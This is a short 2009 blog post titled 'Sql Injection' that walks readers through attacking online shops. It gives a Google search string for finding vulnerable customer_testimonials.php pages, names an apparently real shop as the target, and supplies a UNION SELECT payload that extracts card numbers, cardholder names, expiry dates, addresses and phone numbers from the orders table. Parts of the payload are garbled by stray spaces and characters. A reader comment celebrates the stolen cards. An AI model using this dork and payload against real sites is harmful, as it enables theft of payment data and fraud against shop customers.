Sql Injection
Posted by: Bug Dork on: January 7, 2009
well, I have tried this and IT DOES WORK 
First, google for
inurl:customer_testimonials.php?
Go to advanced search and select 100 enteries on one page
Then go to the second page and open a website.
Suppose, our target is
Code:
http://www.supermagnetman.net/customer_testimonials.php
Then paste the following code in the address bar
Quote:
| customer_testimonials.php?testimonial_id=-8%20union%20select%200,1,2,3,4,concat(payment_meth od,0×7c3d3d7c,cc_type,0×7c3d3d7c,cc_owner,0×7c3d3d 7c,cc_number,0 x7c3d3d7c,cc_expires,0×7c3d3d7c,billing_country,0x 7c3d3d7c,billing_address_forma t _id,0×7c3d3d7c,billing_state,0×7c3d3d7c,billing_po stcode,0×7c3d3d7c,customers_te l ephone,0×7c3d3d7c,customers_name,0×7c3d3d7c,custom ers_company,0×7c3d3d7c,custome r s_street_address,0×7c3d3d7c,billing_city),6,7%20fr om%20orders/* |
so that it becomes
Code:
http://www.supermagnetman.net/customer_testimonials.php?testimonial_id=-8%20union%20s
1 Response to "Sql Injection"
Comments are closed.
January 7, 2009 at 3:48 pm
waw,,,, ada credit card???? wakakkakaa